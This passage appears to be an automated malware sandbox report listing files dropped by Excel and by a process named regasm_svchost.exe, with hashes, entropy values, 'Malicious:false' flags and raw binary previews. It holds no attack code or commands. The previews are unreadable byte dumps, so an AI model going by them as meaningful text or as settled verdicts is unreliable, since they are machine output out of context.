                                                                Preview:.....;...y..........U......TF..................;.......B.>...................-...................".....-...........................".....-.....................-...............$.B.....;...@.]...;...M...I...?...1...!.........................3.x./.z.&.................................&.t.E.k.f.j...o...~.............................*...=...R...a...q.#.../...;...F...Q...Z...a...g...l...q.$.t.5.v.G.x.Y.x.k.v...p...h...]...N...<...&.$...>.0.........................-...............-.......-.....................-...............$...%...'...'.~.&.y.$.u.2.l.@.d.N.].\.V.k.N.z.G...@...9...;...>...@...C...D...E...E...C...9...0...'......... ...2...D...V...h...z...............................................................!.{.,.u.6.v.@.u.J.s.S.o.\.j.f.e.o.`.x.\...Z...V...Q...K...E...@...;...8...5...1...-...-...............................j...\...O...B...3...$.....................................}...n...^.s.N.a.>.P...?.-.3.*.'.&...!.....................................l...T...<...$...#...!... ... .....

                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\49A91A21.wmf

                                                                Download File
                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                File Type:ms-windows metafont .wmf
                                                                Category:dropped
                                                                Size (bytes):5272
                                                                Entropy (8bit):5.285241347882949
                                                                Encrypted:false
                                                                SSDEEP:96:yJfA2dC7LGXAv8CfvFWdGjiXxkvwTSbaMt4A/XHaAEMEerR37D9ICdwpZ988NGGl:0fA2dkqXAv8CfvFWdGjiXxkvwT0aMt4d
                                                                MD5:EC174895ABDBC105951A481063FAE193
                                                                SHA1:5BA9EA080258691CBA5132A2878914FCC1E60069
                                                                SHA-256:B1E22ABF91108C126966E16F88FE90EA50E752B6A90E8559C7A28908B209AD23
                                                                SHA-512:41751DAEB257EAFA078497CE7060477227D2B650E82654181627E6F28FC9D17342F1FC2B6C7C76BF9FAE86791509A2AED269FE181DBC264507D7BB9C2ED6371B
                                                                Malicious:false
                                                                Preview:...................PV......A.....2...........................................-...................".....-...........................".....-.............?.......-...............$...].X.+.....'... .].X...................-...............-.......-.....................-...............$.C.....................................~...p...a...R...C...4...%.....................................}.....8.R.{.2.w.-.t.'.q.".o...j...v...|...............r.......................#.......:...F...R...a...o...}.%...,...4...<...E...N...X...a...k...v.............................-.......-.......-.............?.......-...........j...$.3.N.,.M.,.K.+.J.+.H.*.<.&.0.".$.............................................................#...'...,...0...=.|.O...e...\...b...i...p...w...~............. ..."...#...%...'...+...1...8...?.v.E.h.J.V.N.C.N.,.....-...............-.......-.............?.......-...........6...$...i.8.h.J.e.[.`.j.[.x.U...O...I...C...X...l.....................................t...g...Z...N.|.C.i.8.....-.......

                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\49CB660F.png

                                                                Download File
                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
                                                                Category:dropped
                                                                Size (bytes):2647
                                                                Entropy (8bit):7.8900124483490135
                                                                Encrypted:false
                                                                SSDEEP:48:H73wCcD5X+ajENpby1MTln0V1oPd8V8EAWG09tXIa1iBINm4YwFi9:H73KAajQPiMWJG08a1qINm4jU9
                                                                MD5:E46357D82EBC866EEBDA98FA8F94B385
                                                                SHA1:76C27D89AB2048AE7B56E401DCD1B0449B6DDF05
                                                                SHA-256:B77A19A2F45CBEE79DA939F995DBD54905DED5CB31E7DB6A6BE40A7F6882F966
                                                                SHA-512:8EC0060D1E4641243844E596031EB54EE642DA965078B5A3BC0B9E762E25D6DF6D1B05EACE092BA53B3965A29E3D34387A5A74EB3035D1A51E8F2025192468F3
                                                                Malicious:false
                                                                Preview:.PNG........IHDR.............../....EPLTE.......................o...ttu`aaLML.s;.../-,................~_)$....IDATx..].b.*....Y\.....o..4...bl.6.1...Y.".|.2A@y.../...X.X..X..2X.........o.Xz}go.*m..UT.DK...ukX.....t.%..iB......w.j.1].].m....._)T...Z./.%.tm..Eq...v...wNX@.I..'$CS:e.K.Un.U.v......*.P.j. .5.N.5,..B]....y..2!..^.?...5..A...>"....)...}.*.....{[e4(.Nn....x.,....t.1..6.....}K).$.I.%n$b..G.g.w.....M..w..B.......tF".YtI..C.s.~)..<@"......-..._.(x...b..C..........;5.=.......c...s.....>.E;g.#.hk.Q..g,o;Z`.$.p&.8..ia...La....~XD.4p...8......HuYw.~X.+&Q.a.H.C..ly..X..a.?O.yS,C.r..........Xbp&.D..1.....c.cp..G.....L.M..2..5...4..L.E..`.`9...@...A.....A.E;...YFN.A.G.8..>aI.I.,...K..t..].FZ...E..F....Do../.d.,..&.f.e!..6.......2.;..gNqH`...X..\...AS...@4...#.....!D}..A_....1.W..".S.A.HIC.I'V...2..~.O.A}N........@K.B./...J,.E.....[`I>.F....$v$...:,..H..K.om.E..S29kM/..z.W...hae..62z%}y..q..z...../M.X..)....B eC..........x.C.42u...W...7.7.7

                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4CEA0799.wmf

                                                                Download File
                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                File Type:ms-windows metafont .wmf
                                                                Category:dropped
                                                                Size (bytes):2938
                                                                Entropy (8bit):6.0265045156062
                                                                Encrypted:false
                                                                SSDEEP:48:3yK4ugz0Jlf4vawlgNnHy53lTOI2unL4uMALkaaHx6pHUei0DL4ugHMgNrZfL4uC:CkKG4inSdpOIfM13x6p/gsgNhHi
                                                                MD5:9C7DC1722CFEDEB1B92945D2A84F07BE
                                                                SHA1:199E235959217CF9B37B3535C58165B3BE7CA03E
                                                                SHA-256:FC8231D16DDD7CFE60120BE2442AA2B12665A5B7873BEA9A21DF0EDC2E23B923
                                                                SHA-512:F6B37BA42B7EAEE0F4004D6B66BBD5E8E0691651D48CFF45DF4BB71F242FEF8D7816398C299303A881743DBB72A90CD870221854FA13613B16F6943E7D8F5C96
                                                                Malicious:false
                                                                Preview:...................1S..................................G.....................-...................".....-...........................".....-.....................-...............$...............................w...i...Z...K...=.../...!.............#...'...+.../...1...3...5...6...6...7...:...?...E...L.m.T.O.[.-.c...f...i...k...n...q...t...w...y...|...~.....u...d...T...C...2...!.......................................~...n..._...P...A...3.........{...s...j...`...T...F...7...,... .....|...x...v...u...u...w...y...|.....t...\...C...(...............O............. .9.2...<...E...M.v.T.O.Y.(.]..._..._...^...\...Y...U.q.O.`.I.P.A.B.8.5.2.*./...0...3...:...C...O...]...l...}.....s...\...F.../.............1...K...e.........}...i...V...L...B...8.../...&.#.../...<...P...c...t...................................................................=...K...Y...f.$.s.....9...D...P...\...i...v............................. ...+.9.5.S.B.w.M...W...a...i...p.,.v.P.{.t...........g.~...{...x...s...m...f..._...V.&.N.>.

                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\55E8D614.wmf

                                                                Download File
                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                File Type:ms-windows metafont .wmf
                                                                Category:dropped
                                                                Size (bytes):18246
                                                                Entropy (8bit):5.519376448785636
                                                                Encrypted:false
                                                                SSDEEP:384:S+2pChs/JBLKnZQsTdbYsel0ODZ0dWBJHbIHMlKKFsoeS+vVrnZJi4RBcC/DFgDk:S+2pCy/JtKnZQsTdEsel0ODZ0dWBJHb4
                                                                MD5:F10B70FD357B4626AF9DCA102F202B08
                                                                SHA1:0C3F78832B29792E0927C9BE0B4536363CE2389F
                                                                SHA-256:BD7904285D6BDB1CD2509ADB1900BEB8CBAEA7227B7C0F417E6ED1BC23CF2FDD
                                                                SHA-512:CAA67F7AF60F48E965CE927DB7B63AB73FE2F19872B9F061C230DD499AB906E5A600627EEB1C92507EC54ED09D574633BCC15F05D76E29C30BA581A66B6D4DCF
                                                                Malicious:false
                                                                Preview:.......!.8..........S.......#..........................1.....................-...................".....-...........................".....-.....................-...............$...T...A...A...T.>.K.o.K...T.....................-.......-.......-.....................-...........f...$.1...v.x.u.l.t.].s.M.r.>.q./.p.".o...n.3.l.L.a.d.N.y.4...................k...@.........~...j...S...9...B...N...]...m...|................................. ...G...r...................;...U...h...s...v.....-...............-.......-...........fff.......-...........F...$.!.................y.4.d.N.L.a.3.l...n...h...Y...C...&...................Y...0.....................8...R...i...}.............@...k.........-...............-.......-.....................-...........F...$.!.........x...n...a...R...B.".0.*...,...(...............................i...L...2............."...4...F...V...e...q.$.z.<...W...u.........-...............-.......-...........fff.......-...........F...$.!.r...o...i...`...V...J...=.../... .............

                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\58A1BADA.wmf

                                                                Download File
                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                File Type:ms-windows metafont .wmf
                                                                Category:dropped
                                                                Size (bytes):12132
                                                                Entropy (8bit):5.9060942848497815
                                                                Encrypted:false
                                                                SSDEEP:192:8DZNlga1my4v0vpuoMMlS4zWelC/eZOo4Crqr0verjrXw4IInwoIw3/ahrarPrIp:8DZNlFIV0xuoMM9FlC/eZOoRU0v4nXwj
                                                                MD5:BFC425A2BADFB4928B8CE72CBECAA6B9
                                                                SHA1:FBE3F7B754A574D309A2089BE507F84A8483CD81
                                                                SHA-256:19530F8B5AE780586EB027E247C1F9D453B6D1700348A5CD2771325BCDCAA01A
                                                                SHA-512:338BE542249548C6A8F7780A527AE8B2034EFFB48528A97A2B8CC01B4405AF0E2BCBDD828FB5A25E44711BDBEE20BA067AF4FB7C81F8898A02952B8AEB7D2C61
                                                                Malicious:false
                                                                Preview:....................T..................................4.....................-...................".....-...........................".....-.....................-...............$.......9.................................-...............-.......-.....................-...............$.d...g...s...~.............{...`...E...*...........................j...M.../.%.../...9...B...K...U.|.].^.f.?.o.!.w.....................e...D...#...................{...Y...7.......................g...U...E...6...'.....................n.'.[.L.k.q.z.................+...P...t...................,...Q...u............................. .).".=.$.Q.&.f.'.{.(...)...)...)...(..."...)...1.x.;.b.E.M.O.8.X.&.a...g.....-...............-.......-.....................-...............$.....>...4...*.......................................................................w...e...Q...>...*...%... ...............................................................~...y...u...p.$.m.+.i.2.f.+._.#.T...F...6...$................."...'...-...-.

                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6C1C1AA0.wmf

                                                                Download File
                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                File Type:ms-windows metafont .wmf
                                                                Category:dropped
                                                                Size (bytes):2938
                                                                Entropy (8bit):6.0265045156062
                                                                Encrypted:false
                                                                SSDEEP:48:3yK4ugz0Jlf4vawlgNnHy53lTOI2unL4uMALkaaHx6pHUei0DL4ugHMgNrZfL4uC:CkKG4inSdpOIfM13x6p/gsgNhHi
                                                                MD5:9C7DC1722CFEDEB1B92945D2A84F07BE
                                                                SHA1:199E235959217CF9B37B3535C58165B3BE7CA03E
                                                                SHA-256:FC8231D16DDD7CFE60120BE2442AA2B12665A5B7873BEA9A21DF0EDC2E23B923
                                                                SHA-512:F6B37BA42B7EAEE0F4004D6B66BBD5E8E0691651D48CFF45DF4BB71F242FEF8D7816398C299303A881743DBB72A90CD870221854FA13613B16F6943E7D8F5C96
                                                                Malicious:false
                                                                Preview:...................1S..................................G.....................-...................".....-...........................".....-.....................-...............$...............................w...i...Z...K...=.../...!.............#...'...+.../...1...3...5...6...6...7...:...?...E...L.m.T.O.[.-.c...f...i...k...n...q...t...w...y...|...~.....u...d...T...C...2...!.......................................~...n..._...P...A...3.........{...s...j...`...T...F...7...,... .....|...x...v...u...u...w...y...|.....t...\...C...(...............O............. .9.2...<...E...M.v.T.O.Y.(.]..._..._...^...\...Y...U.q.O.`.I.P.A.B.8.5.2.*./...0...3...:...C...O...]...l...}.....s...\...F.../.............1...K...e.........}...i...V...L...B...8.../...&.#.../...<...P...c...t...................................................................=...K...Y...f.$.s.....9...D...P...\...i...v............................. ...+.9.5.S.B.w.M...W...a...i...p.,.v.P.{.t...........g.~...{...x...s...m...f..._...V.&.N.>.

                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7C5529F5.png

                                                                Download File
                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                File Type:PNG image data, 160 x 207, 16-bit gray+alpha, non-interlaced
                                                                Category:dropped
                                                                Size (bytes):34940
                                                                Entropy (8bit):7.95709243390712
                                                                Encrypted:false
                                                                SSDEEP:768:z7EWZ2OgYAMTpg2Z6Jiv4OFsTyywY508zIK:dZgYA+HZ6Av4OFsTyTY5Rz5
                                                                MD5:18EE81243CBD604CD9FF545A60AA737A
                                                                SHA1:B09C96F31E4399CB1359615312AEA82D9A31BE5C
                                                                SHA-256:35BE35DA765C6909811D8F90A05649B8D179A51068802DDA9D524D48B0A642F1
                                                                SHA-512:59B1C0B60AC045DDFB1A696F622C57C41B99B117ECF6821414D67ADD6E5DFFED6E6F72BC39655E45FACDB8CCDF10BB722F8294EC69EF6C1D79149CC4CE08314A
                                                                Malicious:false
                                                                Preview:.PNG........IHDR................j....bKGD....1.....pHYs.........V.......IDATx..w......=s..y.e.9g.DrP1....H..E.DEQAQPDE..E.DQ.$K..s.....'....W...\.....s..9=].=uz............................h...)g.....V7.o.%..`...:@ .....}u......P.Q6...@..P.K(...D..}...?.......am!........=...../A.g.2.....P..1..L.o...C. |....p.T`&.<....q./@......PNB.8h...Q ....u..$.|.Jw....L...(3.|.............*...d.@..P.,\x.....w~].....@..P...6P...f8......>...........y..[..u.gG.B...E.o..|M..(...q..Ov.f..K].V..4.....oYP7A..8.A...?..!.!.J.Y....]'.A...... b.....@......tG.........&....^...l..B.....;.Iq.....a.+..O=.A.T...P8.c....n.]...`:.....0.@...q....4.^..w....#.m._....AK..V..'!......v..+..Cb_`.......L....9.......R.G.$......]...0....$....T.....u........._....v.......<1...H...c...R...2\...\...(D.!.......<.z.V...p~..e...G......>T?..W...H<..WC.3....4..XP....`...g..+.K.9.T...o.L....j......!k.?....P.(.{...P=.|.A.2....*TN..}.\.z.Pq!....C...v7............V,.e...A6...DM...

                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\942C41EC.png

                                                                Download File
                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                File Type:PNG image data, 160 x 207, 16-bit gray+alpha, non-interlaced
                                                                Category:dropped
                                                                Size (bytes):34940
                                                                Entropy (8bit):7.95709243390712
                                                                Encrypted:false
                                                                SSDEEP:768:z7EWZ2OgYAMTpg2Z6Jiv4OFsTyywY508zIK:dZgYA+HZ6Av4OFsTyTY5Rz5
                                                                MD5:18EE81243CBD604CD9FF545A60AA737A
                                                                SHA1:B09C96F31E4399CB1359615312AEA82D9A31BE5C
                                                                SHA-256:35BE35DA765C6909811D8F90A05649B8D179A51068802DDA9D524D48B0A642F1
                                                                SHA-512:59B1C0B60AC045DDFB1A696F622C57C41B99B117ECF6821414D67ADD6E5DFFED6E6F72BC39655E45FACDB8CCDF10BB722F8294EC69EF6C1D79149CC4CE08314A
                                                                Malicious:false
                                                                Preview:.PNG........IHDR................j....bKGD....1.....pHYs.........V.......IDATx..w......=s..y.e.9g.DrP1....H..E.DEQAQPDE..E.DQ.$K..s.....'....W...\.....s..9=].=uz............................h...)g.....V7.o.%..`...:@ .....}u......P.Q6...@..P.K(...D..}...?.......am!........=...../A.g.2.....P..1..L.o...C. |....p.T`&.<....q./@......PNB.8h...Q ....u..$.|.Jw....L...(3.|.............*...d.@..P.,\x.....w~].....@..P...6P...f8......>...........y..[..u.gG.B...E.o..|M..(...q..Ov.f..K].V..4.....oYP7A..8.A...?..!.!.J.Y....]'.A...... b.....@......tG.........&....^...l..B.....;.Iq.....a.+..O=.A.T...P8.c....n.]...`:.....0.@...q....4.^..w....#.m._....AK..V..'!......v..+..Cb_`.......L....9.......R.G.$......]...0....$....T.....u........._....v.......<1...H...c...R...2\...\...(D.!.......<.z.V...p~..e...G......>T?..W...H<..WC.3....4..XP....`...g..+.K.9.T...o.L....j......!k.?....P.(.{...P=.|.A.2....*TN..}.\.z.Pq!....C...v7............V,.e...A6...DM...

                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\988F60FD.wmf

                                                                Download File
                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                File Type:ms-windows metafont .wmf
                                                                Category:dropped
                                                                Size (bytes):18246
                                                                Entropy (8bit):5.519376448785636
                                                                Encrypted:false
                                                                SSDEEP:384:S+2pChs/JBLKnZQsTdbYsel0ODZ0dWBJHbIHMlKKFsoeS+vVrnZJi4RBcC/DFgDk:S+2pCy/JtKnZQsTdEsel0ODZ0dWBJHb4
                                                                MD5:F10B70FD357B4626AF9DCA102F202B08
                                                                SHA1:0C3F78832B29792E0927C9BE0B4536363CE2389F
                                                                SHA-256:BD7904285D6BDB1CD2509ADB1900BEB8CBAEA7227B7C0F417E6ED1BC23CF2FDD
                                                                SHA-512:CAA67F7AF60F48E965CE927DB7B63AB73FE2F19872B9F061C230DD499AB906E5A600627EEB1C92507EC54ED09D574633BCC15F05D76E29C30BA581A66B6D4DCF
                                                                Malicious:false
                                                                Preview:.......!.8..........S.......#..........................1.....................-...................".....-...........................".....-.....................-...............$...T...A...A...T.>.K.o.K...T.....................-.......-.......-.....................-...........f...$.1...v.x.u.l.t.].s.M.r.>.q./.p.".o...n.3.l.L.a.d.N.y.4...................k...@.........~...j...S...9...B...N...]...m...|................................. ...G...r...................;...U...h...s...v.....-...............-.......-...........fff.......-...........F...$.!.................y.4.d.N.L.a.3.l...n...h...Y...C...&...................Y...0.....................8...R...i...}.............@...k.........-...............-.......-.....................-...........F...$.!.........x...n...a...R...B.".0.*...,...(...............................i...L...2............."...4...F...V...e...q.$.z.<...W...u.........-...............-.......-...........fff.......-...........F...$.!.r...o...i...`...V...J...=.../... .............

                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A12D705.wmf

                                                                Download File
                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                File Type:ms-windows metafont .wmf
                                                                Category:dropped
                                                                Size (bytes):12132
                                                                Entropy (8bit):5.9060942848497815
                                                                Encrypted:false
                                                                SSDEEP:192:8DZNlga1my4v0vpuoMMlS4zWelC/eZOo4Crqr0verjrXw4IInwoIw3/ahrarPrIp:8DZNlFIV0xuoMM9FlC/eZOoRU0v4nXwj
                                                                MD5:BFC425A2BADFB4928B8CE72CBECAA6B9
                                                                SHA1:FBE3F7B754A574D309A2089BE507F84A8483CD81
                                                                SHA-256:19530F8B5AE780586EB027E247C1F9D453B6D1700348A5CD2771325BCDCAA01A
                                                                SHA-512:338BE542249548C6A8F7780A527AE8B2034EFFB48528A97A2B8CC01B4405AF0E2BCBDD828FB5A25E44711BDBEE20BA067AF4FB7C81F8898A02952B8AEB7D2C61
                                                                Malicious:false
                                                                Preview:....................T..................................4.....................-...................".....-...........................".....-.....................-...............$.......9.................................-...............-.......-.....................-...............$.d...g...s...~.............{...`...E...*...........................j...M.../.%.../...9...B...K...U.|.].^.f.?.o.!.w.....................e...D...#...................{...Y...7.......................g...U...E...6...'.....................n.'.[.L.k.q.z.................+...P...t...................,...Q...u............................. .).".=.$.Q.&.f.'.{.(...)...)...)...(..."...)...1.x.;.b.E.M.O.8.X.&.a...g.....-...............-.......-.....................-...............$.....>...4...*.......................................................................w...e...Q...>...*...%... ...............................................................~...y...u...p.$.m.+.i.2.f.+._.#.T...F...6...$................."...'...-...-.

                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AB3879AE.png

                                                                Download File
                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
                                                                Category:dropped
                                                                Size (bytes):2647
                                                                Entropy (8bit):7.8900124483490135
                                                                Encrypted:false
                                                                SSDEEP:48:H73wCcD5X+ajENpby1MTln0V1oPd8V8EAWG09tXIa1iBINm4YwFi9:H73KAajQPiMWJG08a1qINm4jU9
                                                                MD5:E46357D82EBC866EEBDA98FA8F94B385
                                                                SHA1:76C27D89AB2048AE7B56E401DCD1B0449B6DDF05
                                                                SHA-256:B77A19A2F45CBEE79DA939F995DBD54905DED5CB31E7DB6A6BE40A7F6882F966
                                                                SHA-512:8EC0060D1E4641243844E596031EB54EE642DA965078B5A3BC0B9E762E25D6DF6D1B05EACE092BA53B3965A29E3D34387A5A74EB3035D1A51E8F2025192468F3
                                                                Malicious:false
                                                                Preview:.PNG........IHDR.............../....EPLTE.......................o...ttu`aaLML.s;.../-,................~_)$....IDATx..].b.*....Y\.....o..4...bl.6.1...Y.".|.2A@y.../...X.X..X..2X.........o.Xz}go.*m..UT.DK...ukX.....t.%..iB......w.j.1].].m....._)T...Z./.%.tm..Eq...v...wNX@.I..'$CS:e.K.Un.U.v......*.P.j. .5.N.5,..B]....y..2!..^.?...5..A...>"....)...}.*.....{[e4(.Nn....x.,....t.1..6.....}K).$.I.%n$b..G.g.w.....M..w..B.......tF".YtI..C.s.~)..<@"......-..._.(x...b..C..........;5.=.......c...s.....>.E;g.#.hk.Q..g,o;Z`.$.p&.8..ia...La....~XD.4p...8......HuYw.~X.+&Q.a.H.C..ly..X..a.?O.yS,C.r..........Xbp&.D..1.....c.cp..G.....L.M..2..5...4..L.E..`.`9...@...A.....A.E;...YFN.A.G.8..>aI.I.,...K..t..].FZ...E..F....Do../.d.,..&.f.e!..6.......2.;..gNqH`...X..\...AS...@4...#.....!D}..A_....1.W..".S.A.HIC.I'V...2..~.O.A}N........@K.B./...J,.E.....[`I>.F....$v$...:,..H..K.om.E..S29kM/..z.W...hae..62z%}y..q..z...../M.X..)....B eC..........x.C.42u...W...7.7.7

                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C17528C4.jpeg

                                                                Download File
                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                                                                Category:dropped
                                                                Size (bytes):8815
                                                                Entropy (8bit):7.944898651451431
                                                                Encrypted:false
                                                                SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                                                                MD5:F06432656347B7042C803FE58F4043E1
                                                                SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                                                                SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                                                                SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                                                                Malicious:false
                                                                Preview:......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K

                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E4DA58C6.wmf

                                                                Download File
                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                File Type:ms-windows metafont .wmf
                                                                Category:dropped
                                                                Size (bytes):5272
                                                                Entropy (8bit):5.285241347882949
                                                                Encrypted:false
                                                                SSDEEP:96:yJfA2dC7LGXAv8CfvFWdGjiXxkvwTSbaMt4A/XHaAEMEerR37D9ICdwpZ988NGGl:0fA2dkqXAv8CfvFWdGjiXxkvwT0aMt4d
                                                                MD5:EC174895ABDBC105951A481063FAE193
                                                                SHA1:5BA9EA080258691CBA5132A2878914FCC1E60069
                                                                SHA-256:B1E22ABF91108C126966E16F88FE90EA50E752B6A90E8559C7A28908B209AD23
                                                                SHA-512:41751DAEB257EAFA078497CE7060477227D2B650E82654181627E6F28FC9D17342F1FC2B6C7C76BF9FAE86791509A2AED269FE181DBC264507D7BB9C2ED6371B
                                                                Malicious:false
                                                                Preview:...................PV......A.....2...........................................-...................".....-...........................".....-.............?.......-...............$...].X.+.....'... .].X...................-...............-.......-.....................-...............$.C.....................................~...p...a...R...C...4...%.....................................}.....8.R.{.2.w.-.t.'.q.".o...j...v...|...............r.......................#.......:...F...R...a...o...}.%...,...4...<...E...N...X...a...k...v.............................-.......-.......-.............?.......-...........j...$.3.N.,.M.,.K.+.J.+.H.*.<.&.0.".$.............................................................#...'...,...0...=.|.O...e...\...b...i...p...w...~............. ..."...#...%...'...+...1...8...?.v.E.h.J.V.N.C.N.,.....-...............-.......-.............?.......-...........6...$...i.8.h.J.e.[.`.j.[.x.U...O...I...C...X...l.....................................t...g...Z...N.|.C.i.8.....-.......

                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E7E7245B.wmf

                                                                Download File
                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                File Type:ms-windows metafont .wmf
                                                                Category:dropped
                                                                Size (bytes):7482
                                                                Entropy (8bit):5.299545933702229
                                                                Encrypted:false
                                                                SSDEEP:192:FfQ+XJhT/Xgbx3EE+iwKEOZmLajEY3pqa:FIyJhTPoEEJwIoUfl
                                                                MD5:EC5BD3A7DCD0DAD4AA2BB10BC926C49E
                                                                SHA1:04896FCABAFB525F53E3D7CFB1BD5744960A2C93
                                                                SHA-256:E02900DB78FEDDA33402D93227D455303834B4B314A335F8C0DF7A0B8AC1F97F
                                                                SHA-512:DAD602EB21BC25C71AE37969004906F25A23B05171693DA61D7D0829A87377F8616E9DB34AB0ECCDF66BD6C88B7CAC05AB36A6C962EFF5DD6BE03868F617F9CF
                                                                Malicious:false
                                                                Preview:.........M...^......W..........................M.................................................................................-............Oa.......-.......$.....}.6.}.6.>.......}...}.........fff.......-...............$.....|...|...=.......=...|...|..........Oa.......-...............$.....>...>.....M.D.......>...>.........fff.......-...............$... .>.5.>.7....... .>. .>...................-...............$.....>.......&.*.%.<...".S...>...>.........z.........-...............$.......7...9.O.E.O...........................-...............$.......#...#.O...O...........................-...............$.....H.......[.".A...~...H...H...................-...............$.....................v...........................-...............$.....T...............*.(.*.Q.....i...T...T...................-...............$.....A.........x.A...A...A...................-...............$... ...5...R.y.......o.4.;. ... .....................-...............$.........=.6.<.5.........D.....................

                                                                C:\Users\user\AppData\Local\Temp\CabEB8C.tmp

                                                                Download File
                                                                Process:C:\Users\Public\regasm_svchost.exe
                                                                File Type:Microsoft Cabinet archive data, 61712 bytes, 1 file
                                                                Category:dropped
                                                                Size (bytes):61712
                                                                Entropy (8bit):7.995044632446497
                                                                Encrypted:true
                                                                SSDEEP:1536:gzjJiDImMsrjCtGLaexX/zL09mX/lZHIxs:gPJiDI/sr0Hexv/0S/zx
                                                                MD5:589C442FC7A0C70DCA927115A700D41E
                                                                SHA1:66A07DACE3AFBFD1AA07A47E6875BEAB62C4BB31
                                                                SHA-256:2E5CB72E9EB43BAAFB6C6BFCC573AAC92F49A8064C483F9D378A9E8E781A526A
                                                                SHA-512:1B5FA79E52BE495C42CF49618441FB7012E28C02E7A08A91DA9213DB3AB810F0E83485BC1DD5F625A47D0BA7CFCDD5EA50ACC9A8DCEBB39F048C40F01E94155B
                                                                Malicious:false
                                                                Preview:MSCF............,...................I........y.........Tf. .authroot.stl..W.`.4..CK..8U[...q.yL'sf!d.D..."2.2g.<dVI.!.....$).\...!2s..(...[.T7..{}...g....g.....w.km$.&|..qe.n.8+..&...O...`...+..C......`h!0.I.(C..1Q*L.p..".s..B.....H......fUP@..5...(X#.t.2lX.>.y|D.0Z0...M....I(.#.-... ...(.J....2..`.hO..{l+.bd7y.j..u.....3....<......3....s.T...._.'...%{v...s..............KgV.0..X=.A.9w9.Ea.x..........\.=.e.C2......9.......`.o... .......@pm.. a.....-M.....{...s.mW.....;.+...A......0.g..L9#.v.&O>./xSH.S.....GH.6.j...`2.(0g..... Lt........h4.iQ?....[.K.....uI......}.....d....M.....6q.Q~.0.\.'U^)`..u.....-........d..7...2.-.2+3.....A./.%Q...k...Q.,...H.B.%..O..x..5\...Hk.......B.';"Ym.'....X.l.E.6..a8.6..nq..x.r4..1t.....,..u.O..O.L...Uf...X.u.F .(.(.....".q...n{%U.-u....l6!....Z....~o0.}Q'.s.i....7...>4x...A.h.Mk].O.z.].6...53...b^;..>e..x.'1..\p.O.k..B1w..|..K.R.....2.e0..X.^...I...w..!.v5B]x..z.6.G^uF..].b.W...'..I.;..p..@L{.E..@W..3.&...

                                                                C:\Users\user\AppData\Local\Temp\TarEB8D.tmp

                                                                Download File
                                                                Process:C:\Users\Public\regasm_svchost.exe
                                                                File Type:data
                                                                Category:modified
                                                                Size (bytes):162298
                                                                Entropy (8bit):6.30209028339373
                                                                Encrypted:false
                                                                SSDEEP:1536:1ra6crtilgCyNY2IpFQNujcz5YJkKCC/rH8Zz04D8rlCMiB3XlMc6h:1x0imCy6QNujcmJkr97MiVGzh
                                                                MD5:7EE994C83F2744D702CBA18693ED1758
